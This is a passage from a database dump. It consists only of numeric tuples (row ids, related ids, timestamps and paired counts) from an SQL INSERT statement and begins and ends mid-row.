L,13866,4505),(496,112,550,5,1323584,NULL,NULL,NULL,NULL,5846,6396),(497,112,NULL,2,1327798,NULL,NULL,NULL,NULL,1512,6699),(498,113,544,18,1406581,NULL,NULL,NULL,NULL,8955,8510),(499,113,545,19,1489261,542,544,546,NULL,9767,10113),(500,112,549,6,1546364,548,NULL,NULL,NULL,5048,4812),(501,112,547,11,1832108,NULL,NULL,NULL,NULL,6919,1483),(502,112,550,7,2357020,547,548,549,551,3651,3696),(503,112,549,8,2359347,547,548,550,551,3203,3208),(504,112,550,9,2369109,547,548,549,551,1748,2270),(505,112,549,9,2373411,547,548,550,551,2177,1807),(506,114,NULL,10,686053,559,561,NULL,NULL,10504,1029),(507,115,553,18,698228,554,NULL,NULL,NULL,8955,8510),(508,114,560,11,711705,559,561,NULL,NULL,6919,1483),(509,115,555,23,894565,553,NULL,NULL,NULL,13866,4505),(510,115,NULL,14,1008530,552,NULL,NULL,NULL,4318,13875),(511,115,554,24,1158362,553,555,556,NULL,13327,8226),(512,114,NULL,1,1161829,NULL,NULL,NULL,NULL,981,10441),(513,114,560,5,1356532,561,NULL,NULL,NULL,5846,6396),(514,114,559,2,1945635,NULL,NULL,NULL,NULL,1512,6699),(515,114,560,6,2398869,557,NULL,NULL,NULL,5048,4812),(516,114,560,7,2411597,557,NULL,NULL,NULL,3651,3696),(517,114,560,8,2420196,NULL,NULL,NULL,NULL,3203,3208),(518,114,560,9,2490611,557,558,561,NULL,1748,2270),(519,114,561,9,2493611,557,558,559,560,2177,1807),(520,117,566,23,785677,565,NULL,NULL,NULL,13866,4505),(521,116,570,5,887843,567,571,NULL,NULL,5846,6396),(522,117,566,14,924441,565,NULL,NULL,NULL,4318,13875),(523,117,NULL,18,994640,562,565,NULL,NULL,8955,8510),(524,116,567,1,1196913,NULL,NULL,NULL,NULL,981,10441),(525,117,565,24,1207576,566,NULL,NULL,NULL,13327,8226),(526,117,564,19,1329646,565,NULL,NULL,NULL,9767,10113),(527,116,570,10,1692767,567,568,NULL,NULL,10504,1029),(528,117,565,20,2171772,562,564,566,NULL,11134,11207),(529,117,562,21,2191739,563,564,565,566,11598,11667),(530,117,565,22,2198108,562,563,564,566,13052,12612),(531,117,563,22,2206688,562,564,565,566,12611,13084),(532,118,580,1,1062131,581,NULL,NULL,NULL,981,10441),(533,119,NULL,23,1075081,576,NULL,NULL,NULL,13866,4505),(534,118,580,2,1108557,581,NULL,NULL,NULL,1512,6699),(535,119,575,18,1111702,574,NULL,NULL,NULL,8955,8510),(536,118,577,10,1115363,NULL,NULL,NULL,NULL,10504,1029),(537,118,578,11,1274472,577,580,581,NULL,6919,1483),(538,119,NULL,14,1281073,NULL,NULL,NULL,NULL,4318,13875),(539,118,NULL,5,1482778,NULL,NULL,NULL,NULL,5846,6396),(540,118,577,3,1578111,NULL,NULL,NULL,NULL,1169,4287),(541,118,579,6,1785205,577,580,NULL,NULL,5048,4812),(542,118,577,12,2408428,578,NULL,NULL,NULL,4281,1253),(543,118,578,13,2435857,579,NULL,NULL,NULL,3452,1236),(544,118,580,4,2441687,NULL,NULL,NULL,NULL,1171,3571),(545,118,577,13,2767718,NULL,NULL,NULL,NULL,3452,1236),(546,118,578,7,2771509,579,NULL,NULL,NULL,3651,3696),(547,118,579,8,2783743,578,NULL,NULL,NULL,3203,3208),(548,118,580,4,2834546,578,579,NULL,NULL,1171,3571),(549,118,579,9,2838766,578,580,NULL,NULL,1748,2270),(550,118,NULL,9,2841859,577,578,580,NULL,2177,1807),(551,121,585,23,891375,586,NULL,NULL,NULL,13866,4505),(552,120,587,1,965179,NULL,NULL,NULL,NULL,981,10441),(553,121,NULL,14,1069848,NULL,NULL,NULL,NULL,4318,13875),(554,121,585,18,1085820,586,NULL,NULL,NULL,8955,8510),(555,120,587,10,1347599,NULL,NULL,NULL,NULL,10504,1029),(556,121,NULL,24,1485420,NULL,NULL,NULL,NULL,13327,8226),(557,121,583,25,1507613,582,585,586,NULL,13624,10572),(558,121,583,26,1513729,582,585,586,NULL,13604,11316),(559,121,584,15,1515291,NULL,NULL,NULL,NULL,7943,13411),(560,121,582,19,1551604,583,585,586,NULL,9767,10113),(561,121,585,20,1571964,582,583,NULL,NULL,11134,11207),(562,121,584,21,1584345,582,583,585,NULL,11598,11667),(563,121,585,16,1699687,582,586,NULL,NULL,10481,13650),(564,121,585,17,1707480,582,584,586,NULL,11261,13676),(565,121,582,22,1715439,583,585,586,NULL,13052,12612),(566,121,NULL,22,1723465,583,585,586,NULL,12611,13084),(567,123,595,14,269124,592,596,NULL,NULL,4318,13875),(568,122,600,10,273001,601,NULL,NULL,NULL,10504,1029),(569,123,595,23,390613,596,NULL,NULL,NULL,13866,4505),(570,122,600,1,395999,597,NULL,NULL,NULL,981,10441),(571,123,595,18,1321649,NULL,NULL,NULL,NULL,8955,8510),(572,123,594,24,1408768,595,596,NULL,NULL,13327,8226),(573,123,595,19,1568257,592,594,NULL,NULL,9767,10113),(574,123,595,25,1804073,594,NULL,NULL,NULL,13624,10572),(575,123,595,26,1811071,594,596,NULL,NULL,13604,11316),(576,123,594,22,1846543,592,595,596,NULL,13052,12612),(577,123,594,22,1850553,592,595,596,NULL,12611,13084),(578,125,604,18,663354,NULL,NULL,NULL,NULL,8955,8510),(579,124,610,10,691814,611,NULL,NULL,NULL,10504,1029),(580,124,610,1,857836,608,611,NULL,NULL,981,10441),(581,124,608,5,1007912,609,610,611,NULL,5846,6396),(582,125,604,23,1011616,NULL,NULL,NULL,NULL,13866,4505),(583,124,610,6,1028076,608,609,NULL,NULL,5048,4812),(584,124,609,2,1209613,607,610,NULL,NULL,1512,6699),(585,125,604,14,1449320,NULL,NULL,NULL,NULL,4318,13875),(586,124,609,11,1452014,608,610,611,NULL,6919,1483),(587,124,610,12,1463713,608,609,611,NULL,4281,1253),(588,124,610,13,1467939,608,609,611,NULL,3452,1236),(589,124,610,9,1481326,609,611,NULL,NULL,2177,1807),(590,124,609,9,1514402,NULL,NULL,NULL,NULL,1748,2270),(591,127,NULL,18,664116,614,NULL,NULL,NULL,8955,8510),(592,127,612,14,739920,614,NULL,NULL,NULL,4318,13875),(593,127,615,23,786080,NULL,NULL,NULL,NULL,13866,4505),(594,127,612,19,1341821,613,614,615,NULL,9767,10113),(595,127,612,15,1355358,NULL,NULL,NULL,NULL,7943,13411),(596,126,NULL,10,1403059,NULL,NULL,NULL,NULL,10504,1029),(597,127,615,24,1765984,NULL,NULL,NULL,NULL,13327,8226),(598,127,612,20,1845105,613,614,NULL,NULL,11134,11207),(599,127,612,21,1865976,613,614,615,616,11598,11667),(600,127,612,25,2050760,NULL,NULL,NULL,NULL,13624,10572),(601,127,NULL,26,2060456,613,NULL,NULL,NULL,13604,11316),(602,127,612,16,2088735,614,615,NULL,NULL,10481,13650),(603,127,612,17,2113289,613,614,615,NULL,11261,13676),(604,127,612,22,2121957,613,614,615,NULL,12611,13084),(605,127,615,22,2126265,612,613,614,NULL,13052,12612),(606,128,630,10,489825,631,NULL,NULL,NULL,10504,1029),(607,128,NULL,1,578248,631,NULL,NULL,NULL,981,10441),(608,129,625,23,581883,NULL,NULL,NULL,NULL,13866,4505),(609,129,624,18,909253,622,623,625,626,8955,8510),(610,128,630,5,962853,629,NULL,NULL,NULL,5846,6396),(611,129,NULL,14,1036912,622,624,626,NULL,4318,13875),(612,128,630,6,1120830,628,NULL,NULL,NULL,5048,4812),(613,128,630,11,1166738,628,629,631,NULL,6919,1483),(614,128,629,2,1791814,NULL,NULL,NULL,NULL,1512,6699),(615,128,630,7,1900101,629,631,NULL,NULL,3651,3696),(616,128,630,8,1907974,627,628,629,631,3203,3208),(617,128,630,9,2046941,627,628,631,NULL,2177,1807),(618,128,NULL,9,2050315,630,631,NULL,NULL,1748,2270),(619,196,NULL,1,827419,NULL,NULL,NULL,NULL,981,10441),(620,196,973,5,1100389,972,NULL,NULL,NULL,5846,6396),(621,197,969,23,1185369,967,970,NULL,NULL,13866,4505),(622,196,974,10,1227512,NULL,NULL,NULL,NULL,10504,1029),(623,196,NULL,2,1259417,971,975,NULL,NULL,1512,6699),(624,196,974,11,1267576,NULL,NULL,NULL,NULL,6919,1483),(625,196,972,6,1367529,973,974,975,NULL,5048,4812),(626,197,968,14,1432322,966,NULL,NULL,NULL,4318,13875),(627,196,974,7,1730229,971,972,973,975,3651,3696),(628,196,974,8,1736050,971,972,973,975,3203,3208),(629,196,974,3,1912299,972,973,975,NULL,1169,4287),(630,196,973,4,1917014,972,974,975,NULL,1171,3571),(631,196,973,9,1922665,972,974,975,NULL,1748,2270),(632,196,974,9,1928130,972,973,975,NULL,2177,1807),(633,199,NULL,18,796512,NULL,NULL,NULL,NULL,8955,8510),(634,198,NULL,10,805219,NULL,NULL,NULL,NULL,10504,1029),(635,199,980,23,1020305,979,NULL,NULL,NULL,13866,4505),(636,198,984,1,1275273,NULL,NULL,NULL,NULL,981,10441),(637,198,NULL,5,1549933,982,983,NULL,NULL,5846,6396),(638,198,NULL,11,1572120,982,983,985,NULL,6919,1483),(639,199,978,19,1659841,976,977,979,980,9767,10113),(640,199,NULL,14,1712279,NULL,NULL,NULL,NULL,4318,13875),(641,199,978,15,1971190,976,977,979,980,7943,13411),(642,198,981,6,2076715,983,NULL,NULL,NULL,5048,4812),(643,198,984,12,2078996,982,NULL,NULL,NULL,4281,1253),(644,198,984,2,2263341,985,NULL,NULL,NULL,1512,6699),(645,199,NULL,24,2330241,NULL,NULL,NULL,NULL,13327,8226),(646,198,982,7,2350044,981,983,984,985,3651,3696),(647,198,984,8,2353562,981,982,983,985,3203,3208),(648,198,984,9,2361515,981,982,985,NULL,1748,2270),(649,198,984,9,2366155,981,982,985,NULL,2177,1807),(650,204,NULL,1,900129,NULL,NULL,NULL,NULL,981,10441),(651,205,NULL,18,965408,NULL,NULL,NULL,NULL,8955,8510),(652,204,NULL,10,1052327,NULL,NULL,NULL,NULL,10504,1029),(653,204,1012,5,1118045,1014,NULL,NULL,NULL,5846,6396),(654,205,1009,14,1559174,NULL,NULL,NULL,NULL,4318,13875),(655,204,1014,6,1582292,1012,1015,NULL,NULL,5048,4812),(656,205,NULL,23,1683725,NULL,NULL,NULL,NULL,13866,4505),(657,204,1014,11,1799267,1011,1015,NULL,NULL,6919,1483),(658,204,NULL,2,1990689,NULL,NULL,NULL,NULL,1512,6699),(659,204,1014,7,1993602,1012,1015,NULL,NULL,3651,3696),(660,204,1014,8,2000035,1012,1015,NULL,NULL,3203,3208),(661,204,1012,12,2197563,1011,1014,1015,NULL,4281,1253),(662,204,1014,13,2203151,1011,1012,1015,NULL,3452,1236),(663,204,1014,9,2215519,1011,1012,1015,NULL,1748,2270),(664,204,1014,9,2233426,1012,1015,NULL,NULL,2177,1807),(665,206,NULL,10,805159,1024,NULL,NULL,NULL,10504,1029),(666,207,1016,14,805324,NULL,NULL,NULL,NULL,4318,13875),(667,206,1022,5,1116352,1023,1025,NULL,NULL,5846,6396),(668,207,NULL,23,1188887,1020,NULL,NULL,NULL,13866,4505),(669,206,NULL,1,1189704,1021,1022,1024,NULL,981,10441),(670,206,NULL,6,1392070,1021,1022,1024,NULL,5048,4812),(671,206,NULL,11,1518665,1022,1023,1025,NULL,6919,1483),(672,206,1021,12,1589293,1024,NULL,NULL,NULL,4281,1253),(673,206,1021,13,1596827,1022,1023,1024,NULL,3452,1236),(674,206,1023,2,1770015,1022,1024,1025,NULL,1512,6699),(675,206,1021,13,1914814,NULL,NULL,NULL,NULL,3452,1236),(676,207,1019,18,1964039,1018,NULL,NULL,NULL,8955,8510),(677,207,1019,19,1987284,1018,1020,NULL,NULL,9767,10113),(678,206,1021,7,2037731,1022,1023,1024,1025,3651,3696),(679,206,1024,8,2042307,1021,1022,1023,1025,3203,3208),(680,206,1021,13,2231156,NULL,NULL,NULL,NULL,3452,1236),(681,206,NULL,9,2236078,NULL,NULL,NULL,NULL,2177,1807),(682,206,1024,8,2814975,1022,1023,1025,NULL,3203,3208),(683,206,NULL,13,2824120,1022,1025,NULL,NULL,3452,1236),(684,206,NULL,9,2847376,1021,1022,1023,NULL,1748,2270),(685,208,1031,1,782799,NULL,NULL,NULL,NULL,981,10441),(686,209,1026,23,923103,1027,1028,1030,NULL,13866,4505),(687,208,1034,10,1005436,NULL,NULL,NULL,NULL,10504,1029),(688,209,NULL,14,1112377,NULL,NULL,NULL,NULL,4318,13875),(689,208,1034,5,1471793,NULL,NULL,NULL,NULL,5846,6396),(690,209,1028,18,1681965,NULL,NULL,NULL,NULL,8955,8510),(691,208,1033,6,2038675,1034,NULL,NULL,NULL,5048,4812),(692,208,1033,7,2171683,1032,1034,NULL,NULL,3651,3696),(693,208,NULL,8,2176406,1033,1034,NULL,NULL,3203,3208),(694,208,1033,2,2387183,1034,1035,NULL,NULL,1512,6699),(695,208,NULL,11,2487251,NULL,NULL,NULL,NULL,6919,1483),(696,208,NULL,3,2557545,NULL,NULL,NULL,NULL,1169,4287),(697,208,1034,8,2558555,1033,NULL,NULL,NULL,3203,3208),(698,208,1034,4,2588348,1032,1033,1035,NULL,1171,3571),(699,208,1034,9,2593200,1031,1033,NULL,NULL,1748,2270),(700,208,NULL,9,2596909,1032,1033,1034,1035,2177,1807),(758,130,638,5,649130,639,NULL,NULL,NULL,5846,6396),(759,130,637,10,1078538,639,640,641,NULL,10504,1029),(760,130,639,11,1098359,637,640,641,NULL,6919,1483),(761,131,634,23,1156344,635,NULL,NULL,NULL,13866,4505),(762,130,639,6,1187269,NULL,NULL,NULL,NULL,5048,4812),(763,130,637,1,1195089,NULL,NULL,NULL,NULL,981,10441),(764,130,NULL,2,1446987,638,639,641,NULL,1512,6699),(765,130,NULL,3,1467609,639,640,641,NULL,1169,4287),(766,130,638,4,1478677,639,640,641,NULL,1171,3571),(767,131,634,14,1561337,NULL,NULL,NULL,NULL,4318,13875),(768,130,NULL,9,1719592,NULL,NULL,NULL,NULL,1748,2270),(769,130,NULL,12,1722604,NULL,NULL,NULL,NULL,4281,1253),(770,130,639,9,1735808,640,NULL,NULL,NULL,2177,1807),(771,132,NULL,1,265308,NULL,NULL,NULL,NULL,981,10441),(772,133,NULL,23,265998,642,NULL,NULL,NULL,13866,4505),(773,133,645,14,497608,646,NULL,NULL,NULL,4318,13875),(774,132,2104,10,512864,651,NULL,NULL,NULL,10504,1029),(775,133,645,18,1239763,644,NULL,NULL,NULL,8955,8510),(776,132,2104,5,1593160,648,649,NULL,NULL,5846,6396),(777,133,642,19,1762249,643,644,645,646,9767,10113),(778,132,647,11,2216520,NULL,NULL,NULL,NULL,6919,1483),(779,133,NULL,15,2238465,643,646,NULL,NULL,7943,13411),(780,133,644,16,2254630,645,646,NULL,NULL,10481,13650),(781,133,645,17,2268719,642,643,646,NULL,11261,13676),(782,133,642,22,2274787,643,644,645,646,12611,13084),(783,133,NULL,22,2279685,642,643,644,645,13052,12612),(784,136,667,10,240310,NULL,NULL,NULL,NULL,10504,1029),(785,137,662,14,269825,665,666,NULL,NULL,4318,13875),(786,136,667,1,659790,NULL,NULL,NULL,NULL,981,10441),(787,137,664,18,875945,662,NULL,NULL,NULL,8955,8510),(788,137,665,23,897563,663,NULL,NULL,NULL,13866,4505),(789,136,670,5,1651694,667,669,671,NULL,5846,6396),(790,136,670,11,1738211,NULL,NULL,NULL,NULL,6919,1483),(791,137,NULL,19,1971554,NULL,NULL,NULL,NULL,9767,10113),(792,136,667,6,2085659,671,NULL,NULL,NULL,5048,4812),(793,136,NULL,12,2105864,668,671,NULL,NULL,4281,1253),(794,136,668,13,2120836,667,669,670,671,3452,1236),(795,136,669,9,2154308,670,671,NULL,NULL,2177,1807),(796,136,670,2,2342253,668,669,671,NULL,1512,6699),(797,136,669,7,2452369,668,670,671,NULL,3651,3696),(798,136,669,8,2455568,668,670,671,NULL,3203,3208),(799,136,669,9,2463537,668,670,671,NULL,1748,2270),(800,132,NULL,1,265308,NULL,NULL,NULL,NULL,981,10441),(801,133,NULL,23,265998,642,NULL,NULL,NULL,13866,4505),(802,133,645,14,497608,646,NULL,NULL,NULL,4318,13875),(803,132,2104,10,512864,651,NULL,NULL,NULL,10504,1029),(804,133,645,18,1239763,644,NULL,NULL,NULL,8955,8510),(805,132,2104,5,1593160,648,649,NULL,NULL,5846,6396),(806,133,642,19,1762249,643,644,645,646,9767,10113),(807,132,647,11,2216520,NULL,NULL,NULL,NULL,6919,1483),(808,133,NULL,15,2238465,643,646,NULL,NULL,7943,13411),(809,133,644,16,2254630,645,646,NULL,NULL,10481,13650),(810,133,645,17,2268719,642,643,646,NULL,11261,13676),(811,133,642,22,2274787,643,644,645,646,12611,13084),(812,133,NULL,22,2279685,642,643,644,645,13052,12612),(813,135,655,23,591965,656,NULL,NULL,NULL,13866,4505),(814,135,652,14,808042,NULL,NULL,NULL,NULL,4318,13875),(815,134,660,5,1007019,657,658,659,661,5846,6396),(816,135,652,18,1055467,653,655,656,NULL,8955,8510),(817,134,658,10,1197341,659,660,661,NULL,10504,1029),(818,134,660,1,1313048,657,658,659,661,981,10441),(819,134,659,6,1688758,657,661,NULL,NULL,5048,4812),(820,135,652,24,1901356,NULL,NULL,NULL,NULL,13327,8226),(821,135,652,25,1934809,NULL,NULL,NULL,NULL,13624,10572),(822,135,652,26,1959006,NULL,NULL,NULL,NULL,13604,11316),(823,134,660,2,2178124,NULL,NULL,NULL,NULL,1512,6699),(824,134,NULL,11,2236563,NULL,NULL,NULL,NULL,6919,1483),(825,134,660,3,2256834,657,659,661,NULL,1169,4287),(826,134,NULL,12,2289436,NULL,NULL,NULL,NULL,4281,1253),(827,135,654,26,2465096,655,656,NULL,NULL,13604,11316),(828,135,653,22,2474663,652,654,655,656,13052,12612),(829,135,NULL,19,2476501,NULL,NULL,NULL,NULL,9767,10113),(830,135,652,22,2482178,653,654,655,656,12611,13084),(907,138,677,1,245150,680,681,NULL,NULL,981,10441),(908,138,680,10,359665,678,681,NULL,NULL,10504,1029),(909,138,677,5,756877,680,NULL,NULL,NULL,5846,6396),(910,138,679,2,1181419,677,NULL,NULL,NULL,1512,6699),(911,138,NULL,11,1353637,NULL,NULL,NULL,NULL,6919,1483),(912,138,681,6,1414804,680,NULL,NULL,NULL,5048,4812),(913,138,677,7,1428752,678,679,680,681,3651,3696),(914,138,680,8,1433992,677,678,681,NULL,3203,3208),(915,139,NULL,23,1556430,674,676,NULL,NULL,13866,4505),(916,138,680,3,1571176,NULL,NULL,NULL,NULL,1169,4287),(917,138,680,4,1580278,678,681,NULL,NULL,1171,3571),(918,138,679,9,1588378,678,680,681,NULL,1748,2270),(919,138,677,9,1599673,679,681,NULL,NULL,2177,1807),(920,140,2105,1,269382,691,NULL,NULL,NULL,981,10441),(921,141,NULL,23,301062,NULL,NULL,NULL,NULL,13866,4505),(922,140,689,5,938367,687,688,2105,691,5846,6396),(923,141,685,18,970997,682,683,NULL,NULL,8955,8510),(924,140,688,2,1147665,687,NULL,NULL,NULL,1512,6699),(925,141,684,24,1156567,683,685,686,NULL,13327,8226),(926,141,683,14,1276348,684,685,686,NULL,4318,13875),(927,141,685,19,2077285,686,NULL,NULL,NULL,9767,10113),(928,141,685,20,2202504,682,683,684,686,11134,11207),(929,141,685,21,2207373,682,683,684,686,11598,11667),(930,140,688,10,2243349,NULL,NULL,NULL,NULL,10504,1029),(931,141,682,22,2336353,683,684,686,NULL,13052,12612),(932,141,684,22,2340067,682,683,686,NULL,12611,13084),(933,143,NULL,14,259043,696,NULL,NULL,NULL,4318,13875),(934,143,NULL,23,593674,NULL,NULL,NULL,NULL,13866,4505),(935,142,700,10,696483,697,NULL,NULL,NULL,10504,1029),(936,143,NULL,18,698239,694,696,NULL,NULL,8955,8510),(937,143,695,15,904460,692,693,696,NULL,7943,13411),(938,143,696,24,1053964,693,694,695,NULL,13327,8226),(939,143,693,19,1270171,695,696,NULL,NULL,9767,10113),(940,143,692,16,1560927,NULL,NULL,NULL,NULL,10481,13650),(941,143,695,17,1640904,692,694,696,NULL,11261,13676),(942,143,695,25,1801946,696,NULL,NULL,NULL,13624,10572),(943,143,694,22,1827445,695,696,NULL,NULL,13052,12612),(944,143,695,22,1829224,696,NULL,NULL,NULL,12611,13084),(945,144,710,5,649746,709,711,NULL,NULL,5846,6396),(946,144,709,10,769885,710,711,NULL,NULL,10504,1029),(947,144,710,1,887622,NULL,NULL,NULL,NULL,981,10441),(948,144,709,6,942279,708,NULL,NULL,NULL,5048,4812),(949,145,NULL,14,1161696,NULL,NULL,NULL,NULL,4318,13875),(950,144,709,2,1252457,707,710,711,NULL,1512,6699),(951,144,710,11,1674501,707,708,711,NULL,6919,1483),(952,144,707,12,1685185,708,709,710,711,4281,1253),(953,144,710,13,1691412,707,708,709,711,3452,1236),(954,144,710,7,1743385,707,708,709,711,3651,3696),(955,144,709,8,1750040,707,710,711,NULL,3203,3208),(956,144,710,9,1827792,707,709,711,NULL,1748,2270),(957,144,709,9,1836977,707,708,710,711,2177,1807),(958,144,NULL,3,1843503,NULL,NULL,NULL,NULL,1169,4287),(959,149,NULL,14,238458,NULL,NULL,NULL,NULL,4318,13875),(960,148,730,10,257580,727,728,731,NULL,10504,1029),(961,149,725,18,614173,722,723,724,NULL,8955,8510),(962,148,730,1,690503,727,728,NULL,NULL,981,10441),(963,149,725,23,706141,NULL,NULL,NULL,NULL,13866,4505),(964,149,723,15,1166093,726,NULL,NULL,NULL,7943,13411),(965,148,729,5,1685156,728,731,NULL,NULL,5846,6396),(966,148,730,6,1725731,729,NULL,NULL,NULL,5048,4812),(967,148,730,7,1740068,729,NULL,NULL,NULL,3651,3696),(968,148,730,8,1749864,729,NULL,NULL,NULL,3203,3208),(969,149,725,19,1775320,NULL,NULL,NULL,NULL,9767,10113),(970,149,NULL,16,1779266,NULL,NULL,NULL,NULL,10481,13650),(971,149,724,17,1800145,722,NULL,NULL,NULL,11261,13676),(972,149,NULL,24,1874874,723,NULL,NULL,NULL,13327,8226),(973,149,722,25,2155127,NULL,NULL,NULL,NULL,13624,10572),(974,149,723,26,2318101,724,725,726,NULL,13604,11316),(975,149,725,17,2481411,723,726,NULL,NULL,11261,13676),(976,149,725,20,2504299,723,NULL,NULL,NULL,11134,11207),(977,149,724,21,2510398,722,723,725,726,11598,11667),(978,149,NULL,22,2637493,NULL,NULL,NULL,NULL,12611,13084),(979,149,NULL,26,2647191,726,NULL,NULL,NULL,13604,11316),(980,149,NULL,22,2670488,722,725,NULL,NULL,13052,12612),(981,149,726,21,2878332,722,723,724,725,11598,11667),(982,147,715,23,736272,NULL,NULL,NULL,NULL,13866,4505),(983,146,719,5,816735,721,NULL,NULL,NULL,5846,6396),(984,147,715,14,895147,NULL,NULL,NULL,NULL,4318,13875),(985,146,720,1,992683,721,NULL,NULL,NULL,981,10441),(986,147,715,24,1392123,NULL,NULL,NULL,NULL,13327,8226),(987,146,718,2,1417481,719,720,721,NULL,1512,6699),(988,147,NULL,18,1417832,NULL,NULL,NULL,NULL,8955,8510),(989,146,719,3,1432245,718,720,721,NULL,1169,4287),(990,146,718,10,1519360,720,NULL,NULL,NULL,10504,1029),(991,146,720,11,1566475,717,718,719,721,6919,1483),(992,146,720,12,1583996,717,718,719,NULL,4281,1253),(993,146,719,13,1589252,717,718,720,NULL,3452,1236),(994,146,717,4,1606208,718,719,720,NULL,1171,3571),(995,146,718,6,1663987,717,719,NULL,NULL,5048,4812),(996,146,717,7,1722578,718,719,720,721,3651,3696),(997,146,720,8,1728063,717,718,719,721,3203,3208),(998,146,718,9,1740352,717,719,720,721,1748,2270),(999,146,720,9,1744938,717,718,719,721,2177,1807),(1186,213,1049,14,248731,1050,NULL,NULL,NULL,4318,13875),(1187,213,1049,23,761741,1050,NULL,NULL,NULL,13866,4505),(1188,212,1053,5,1216724,2119,1055,NULL,NULL,5846,6396),(1189,213,NULL,15,1231812,NULL,NULL,NULL,NULL,7943,13411),(1190,213,1049,18,1576419,NULL,NULL,NULL,NULL,8955,8510),(1191,212,NULL,10,1892938,NULL,NULL,NULL,NULL,10504,1029),(1192,212,2120,1,2070574,NULL,NULL,NULL,NULL,981,10441),(1193,213,1048,24,2071222,NULL,NULL,NULL,NULL,13327,8226),(1194,213,1049,19,2071957,NULL,NULL,NULL,NULL,9767,10113),(1195,213,1050,20,2211974,1046,1047,1048,NULL,11134,11207),(1196,213,1046,21,2218296,1047,1048,1050,NULL,11598,11667),(1197,212,1055,6,2552904,1051,1053,NULL,NULL,5048,4812),(1198,212,NULL,7,2565672,1051,2119,1053,NULL,3651,3696),(1199,212,1055,8,2571041,1051,2119,1053,NULL,3203,3208),(1200,212,1053,9,2580628,1051,2119,1055,NULL,1748,2270),(1201,212,1051,9,2586756,2119,1053,1055,NULL,2177,1807),(1202,211,1037,14,241965,1036,1039,1040,NULL,4318,13875),(1203,210,1044,10,267992,NULL,NULL,NULL,NULL,10504,1029),(1204,210,NULL,1,416043,1042,1044,NULL,NULL,981,10441),(1205,211,1036,18,568454,1038,1039,NULL,NULL,8955,8510),(1206,210,1044,5,601565,1042,NULL,NULL,NULL,5846,6396),(1207,211,1038,23,1214471,NULL,NULL,NULL,NULL,13866,4505),(1208,210,1044,6,1358152,1042,1043,NULL,NULL,5048,4812),(1209,211,1039,19,1457899,1036,1037,1040,NULL,9767,10113),(1210,210,1043,2,1906634,1042,1044,NULL,NULL,1512,6699),(1211,210,1044,7,2271463,1042,1043,1045,NULL,3651,3696),(1212,210,1043,8,2275404,1042,1044,1045,NULL,3203,3208),(1213,210,1044,9,2283906,1042,1043,NULL,NULL,1748,2270),(1214,210,1044,9,2296175,1041,1042,1043,1045,2177,1807),(1215,215,NULL,14,991647,NULL,NULL,NULL,NULL,4318,13875),(1216,214,1064,1,1032555,1065,NULL,NULL,NULL,981,10441),(1217,215,1056,18,1086878,1058,1796,NULL,NULL,8955,8510),(1218,215,1057,19,1246724,1058,1796,1060,NULL,9767,10113),(1219,214,NULL,10,1253402,NULL,NULL,NULL,NULL,10504,1029),(1220,214,1065,11,1442042,1062,1063,1064,NULL,6919,1483),(1221,215,1056,23,1517995,NULL,NULL,NULL,NULL,13866,4505),(1222,214,1064,5,1632389,1062,1065,NULL,NULL,5846,6396),(1223,215,1057,20,1862296,1056,1058,1796,1060,11134,11207),(1224,215,1796,21,1869055,1056,1057,1058,1060,11598,11667),(1225,215,1796,15,1990270,1057,1058,1060,NULL,7943,13411),(1226,215,1056,24,2315874,NULL,NULL,NULL,NULL,13327,8226),(1227,215,1796,21,2336698,1057,1058,1060,NULL,11598,11667),(1228,215,1056,25,2339831,NULL,NULL,NULL,NULL,13624,10572),(1229,215,NULL,26,2344340,1056,1057,1058,1060,13604,11316),(1230,215,NULL,22,2359045,1057,1058,1796,1060,13052,12612),(1231,215,1796,22,2363980,1056,1057,1058,1060,12611,13084),(1232,217,1069,14,269859,NULL,NULL,NULL,NULL,4318,13875),(1233,217,1069,23,661398,1070,NULL,NULL,NULL,13866,4505),(1234,217,1068,18,852097,1069,1070,NULL,NULL,8955,8510),(1235,217,1069,24,1052890,1066,1068,1070,NULL,13327,8226),(1236,217,1069,25,1278237,1066,1070,NULL,NULL,13624,10572),(1237,217,1070,26,1560137,1067,1068,1069,NULL,13604,11316),(1238,217,NULL,15,1671174,1066,1068,1069,1070,7943,13411),(1239,217,1066,16,1682860,1067,1068,1069,1070,10481,13650),(1240,217,1069,17,1688847,1066,1067,1068,1070,11261,13676),(1241,217,1068,19,1740639,1066,1067,1070,NULL,9767,10113),(1242,217,1069,20,1752235,1066,1067,1070,NULL,11134,11207),(1243,217,1069,21,1757893,1066,1067,1070,NULL,11598,11667),(1244,217,1069,22,1771161,1066,1070,NULL,NULL,13052,12612),(1245,217,1069,22,1779019,1066,1067,1070,NULL,12611,13084),(1246,218,NULL,1,391011,NULL,NULL,NULL,NULL,981,10441),(1247,218,1084,10,810447,NULL,NULL,NULL,NULL,10504,1029),(1248,218,1083,5,968020,1082,1084,1085,NULL,5846,6396),(1249,218,1084,11,1229255,1082,1083,1085,NULL,6919,1483),(1250,219,NULL,18,1477879,1076,1078,NULL,NULL,8955,8510),(1251,218,1084,6,1531916,1083,1085,NULL,NULL,5048,4812),(1252,219,1076,14,1552260,NULL,NULL,NULL,NULL,4318,13875),(1253,218,1084,7,1741699,NULL,NULL,NULL,NULL,3651,3696),(1254,218,1084,8,1748067,1083,NULL,NULL,NULL,3203,3208),(1255,218,1084,12,1785939,1082,1083,1085,NULL,4281,1253),(1256,218,1085,13,1790586,1081,1082,1083,1084,3452,1236),(1257,218,1083,9,1804490,1082,1084,1085,NULL,1748,2270),(1258,218,1083,9,1809475,1081,1082,1084,1085,2177,1807),(1259,221,1089,23,895733,1090,NULL,NULL,NULL,13866,4505),(1260,221,1088,18,964277,1089,NULL,NULL,NULL,8955,8510),(1261,221,1089,14,1041542,1090,NULL,NULL,NULL,4318,13875),(1262,221,1089,15,1061908,1087,1088,1090,NULL,7943,13411),(1263,220,1091,10,1075485,NULL,NULL,NULL,NULL,10504,1029),(1264,220,1091,5,1145556,1094,1095,NULL,NULL,5846,6396),(1265,221,1089,19,1253597,1087,1088,1090,NULL,9767,10113),(1266,220,1092,1,1350644,1094,NULL,NULL,NULL,981,10441),(1267,221,1086,16,1491677,1087,1088,1089,1090,10481,13650),(1268,220,1091,6,1496448,NULL,NULL,NULL,NULL,5048,4812),(1269,221,1089,17,1497649,1086,1087,1088,1090,11261,13676),(1270,221,1089,20,1589405,1086,1087,1090,NULL,11134,11207),(1271,221,1089,21,1596187,1086,1087,1090,NULL,11598,11667),(1272,221,1089,22,1744344,1086,1087,NULL,NULL,13052,12612),(1273,221,1089,22,1836242,1086,1087,1088,1090,12611,13084),(1274,223,NULL,23,945623,1100,NULL,NULL,NULL,13866,4505),(1275,222,1101,1,950202,NU